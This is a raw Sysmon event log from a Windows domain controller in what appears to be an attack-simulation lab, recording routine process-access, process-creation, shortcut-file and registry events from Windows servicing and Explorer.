13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.570{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.572{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" 
"C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 11241100x800000000000000011255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.492{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnk2021-01-18 12:24:23.866 11241100x800000000000000011254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.492{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnk2021-01-18 12:24:23.866 11241100x800000000000000011309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.758{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer (7).lnk2021-01-18 13:58:29.758 11241100x800000000000000011308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.680{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (7).lnk2021-01-18 13:58:29.680 13241300x800000000000000011307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:58:29.648{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 10341000x800000000000000011306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 